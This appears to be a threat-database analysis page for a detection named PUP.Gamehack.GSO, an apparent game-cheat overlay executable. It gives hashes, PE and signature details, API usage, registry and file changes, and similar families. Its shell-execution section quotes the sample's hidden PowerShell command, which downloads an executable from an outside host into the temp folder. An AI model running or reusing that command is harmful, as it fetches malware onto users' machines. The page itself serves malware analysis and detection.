Multi-License Discount Quote

Change Region

English
Threat Database Potentially Unwanted Programs PUP.Gamehack.GSO

PUP.Gamehack.GSO

By CagedTech in Potentially Unwanted Programs

Analysis Report

General information

Family Name: PUP.Gamehack.GSO
Signature status: Hash Mismatch

Known Samples

MD5: a7668609025ed001fad36544c0d4a50a
SHA1: 29f38e796e69b63b639bc1ca1fa28b87d34bdde5
SHA256: 75656681E5CF08D2AF0AD8F3A2BB88A8974C770D94F4BBD16B8DBD7975D2505A
File Size: 749.06 KB, 749056 bytes
MD5: 611362bc4aa194c52db4c95555d2b2b8
SHA1: bfd624709a48b3ddfd1c99500c670323e60545f0
SHA256: 5502060679AB6453EE97C27A07D9BA559061DF4B934C89AD3AD7D201A5D001E6
File Size: 9.64 MB, 9637552 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have exports table
  • File doesn't have security information
  • File has TLS information
  • File is 64-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
Show More
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name Value
Company Name Minkio Software
File Description Game Overlay Renderer
File Version 1.4.2.0
Internal Name MinkioOverlay
Legal Copyright Copyright (C) 2025 Minkio Software
Original Filename MinkioExternal.exe
Product Name Minkio Overlay
Product Version 1.4.2

Digital Signatures

Signer Root Status
Areeb Ahmed Code Signing LLC Areeb Ahmed Code Signing LLC Self Signed
Microsoft Corporation Microsoft Code Signing PCA 2011 Hash Mismatch
Microsoft Windows Software Compatibility Publisher Microsoft Windows Third Party Component CA 2013 Hash Mismatch

File Traits

  • dll
  • HighEntropy
  • imgui
  • ntdll
  • WriteProcessMemory
  • x64

Block Information

Total Blocks: 22,702
Potentially Malicious Blocks: 1,611
Whitelisted Blocks: 17,442
Unknown Blocks: 3,649

Visual Map

0 0 ? ? ? ? 0 0 0 0 0 0 0 0 ? 0 x ? ? x 0 0 ? 0 0 0 ? ? ? 0 0 0 0 0 ? ? ? 0 0 ? ? ? ? ? 0 ? 0 ? 0 0 ? 0 ? 0 ? 0 ? ? 0 0 0 ? ? ? 0 0 0 ? 0 ? ? ? ? ? ? ? 0 ? ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 x x 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 x 0 0 x ? 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 ? 0 0 0 0 0 0 ? 0 ? ? 0 ? ? ? ? ? ? ? ? ? x 0 0 0 0 ? x 0 0 0 ? 0 0 ? x ? ? 0 ? ? ? 0 ? ? ? 0 0 0 ? ? x x 0 0 0 ? 0 0 ? ? 0 0 ? ? ? 0 0 0 ? ? 0 ? ? ? 0 ? ? ? 0 0 0 ? ? ? x ? ? ? ? ? ? 0 0 ? 0 0 ? x 0 ? ? ? ? x 0 0 0 0 0 x 0 x 0 ? x 0 0 x x 0 0 0 0 x 0 0 x 0 ? 0 0 0 0 0 x 0 x 0 0 x ? 0 x 0 x x 0 0 0 0 0 0 0 0 ? 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? x 0 x 0 0 0 0 0 x 0 0 0 x 0 ? 0 x 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 0 0 0 0 0 0 0 x 0 ? 0 ? ? 0 ? 0 0 ? 0 0 0 ? ? ? 0 0 0 0 ? 0 ? x 0 ? 0 0 0 0 ? 0 0 0 0 ? 0 0 ? ? ? ? 0 ? 0 ? 0 ? ? ? ? ? ? ? 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 x x x 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 x 0 0 0 0 0 0 0 ? ? ? ? 0 0 ? 0 ? ? ? ? 0 ? 0 0 ? ? 0 0 0 ? 0 ? ? ? 0 0 0 ? 0 ? ? ? 0 ? ? ? 0 0 ? ? ? ? ? ? x 0 0 ? 0 0 ? 0 ? 0 0 0 0 0 ? 0 0 0 ? ? ? 0 0 ? ? 0 ? ? 0 ? ? 0 0 ? ? 0 ? ? ? ? ? ? 0 ? ? 0 0 ? 0 ? 0 0 0 0 ? 0 ? ? 0 ? 0 ? 0 0 ? 0 0 ? 0 ? ? ? 0 0 0 0 0 0 0 0 ? 0 ? ? 0 0 ? 0 ? ? ? ? 0 ? ? 0 0 0 0 0 0 ? ? 0 0 0 ? 0 ? ? ? 0 0 0 0 x 0 x 0 ? 0 0 0 0 ? 0 0 0 0 0 x x x 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 ? 0 0 ? x x 0 0 ? ? ? 0 0 0 0 ? 0 ? x x x ? 0 0 ? ? ? 0 ? ? x ? 0 ? 0 ? ? 0 0 0 0 0 0 0 0 x 0 0 0 0 0 ? 0 0 ? 0 ? ? ? ? ? ? 0 0 ? 0 ? ? 0 0 0 0 0 ? 0 ? ? 0 ? ? 0 ? ? ? 0 0 ? 0 0 ? 0 ? ? 0 0 0 0 0 0 0 0 0 0 x x x 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 x 0 x 0 0 0 0 x x 0 0 ? 0 0 ? 0 0 ? 0 0 ? 0 ? ? ? x ? ? ? x 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 ? ? 0 0 0 0 0 0 0 0 ? 0 ? 0 ? 0 0 ? 0 0 x 0 0 0 ? 0 0 ? 0 0 ? ? 0 0 0 ? 0 0 ? 0 0 x 0 x 0 ? ? ? 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 x 0 0 x x x 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? x x 0 0 0 x 0 0 0 ? 0 0 ? 0 0 ? ? 0 ? 0 0 x ? ? ? 0 0 0 0 ? ? ? ? 0 ? ? ? ? 0 x 0 0 0 0 x x x 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 0 0 0 ? ? 0 ? ? 0 0 0 x 0 x x x 0 0 0 ? 0 ? ? 0 0 0 0 ? 0 0 0 0 ? 0 0 0 ? 0 0 0 0 x 0 0 0 x x 0 ? ? ? 0 ? ? ? 0 0 ? ? ? ? ? 0 ? ? ? 0 ? 0 0 ? ? ? ? ? 0 0 ? 0 ? 0 ? 0 0 ? ? 0 0 ? ? ? x x 0 0 0 x 0 0 0 ? 0 ? 0 0 0 0 x 0 x ? 0 x 0 x 0 x 0 ? 0 0 ? 0 0 0 0 ? ? 0 ? ? 0 ? ? 0 0 0 ? ? ? ? 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 ? 0 ? 0 0 ? 0 ? 0 ? ? ? 0 0 0 ? ? ? 0 0 0 x x x 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 0 ? x 0 0 x 0 0 0 ? 0 0 0 0 x ? 0 0 0 0 0 ? x ? ? 0 0 0 x 0 0 0 ? ? 0 0 0 x 0 0 0 ? 0 0 ? ? ? 0 0 ? 0 0 ? 0 0 ? 0 ? 0 0 x ? ? 0 0 x x ? ? 0 ? 0 0 0 0 0 ? ? ? ? 0 0 0 0 x 0 x x x 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 ? ? ? ? 0 x 0 x 0 0 0 0 0 x 0 0 0 0 0 ? 0 0 0 ? x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? x ? x x 0 0 0 x 0 0 0 0 0 ? x ? 0 ? 0 ? 0 0 x 0 0 0 x 0 0 0 ? ? x 0 0 0 0 x x x 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 x 0 0 ? x 0 0 0 x 0 0 0 ? ? ? ? 0 0 0 ? 0 0 ? 0 0 ? 0 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 0 0 0 0 0 x 0 x x x 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 0 ? 0 0 0 x 0 0 x 0 0 0 0 0 x x 0 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 ? ? ? ? 0 ? 0 ? 0 0 0 0 0 0 x 0 0 0 0 ? x x x 0 0 0 0 0 x 0 0 0 0 0 0 x x 0 x 0 x 0 x 0 x 0 0 0 0 0 x x 0 0 0 ? 0 0 0 0 ? ? 0 0 0 0 0 ? 0 ? 0 0 0 0 0 0 0 0 ? 0 ? ? ? 0 x ? 0 ? ? ? ? ? ? ? 0 x x ? 0 ? 0 ? 0 ? 0 0 0 0 x 0 0 0 ? x 0 ? 0 0 0 0 0 ? 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? x 0 x 0 0 0 0 0 x 0 0 x 0 0 ? x 0 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 x 0 0 x x 0
... Data truncated
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Gamehack.GSR
  • RobloxHack.LE
  • RobloxStealer.B

Files Modified

File Attributes
\device\namedpipe\gmdasllogger Generic Write,Read Attributes
\device\namedpipe\pshost.134232212191987039.5588.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\temp\__psscriptpolicytest_2hf4aavw.xmg.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_x4wcpang.hwm.psm1 Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 梀屧ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 㣙岽ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 鬓岿ǜ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
Show More
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtQueryWnfStateNameInformation
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationObject
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetSystemInformation
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSetTimerEx
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTerminateProcess

15 additional items are not displayed above.

Process Manipulation Evasion
  • NtUnmapViewOfSection
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Shell Execute
  • CreateProcess
Process Terminate
  • TerminateProcess
Encryption Used
  • BCryptOpenAlgorithmProvider
  • CryptAcquireContext
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe

Trending

Most Viewed

Loading...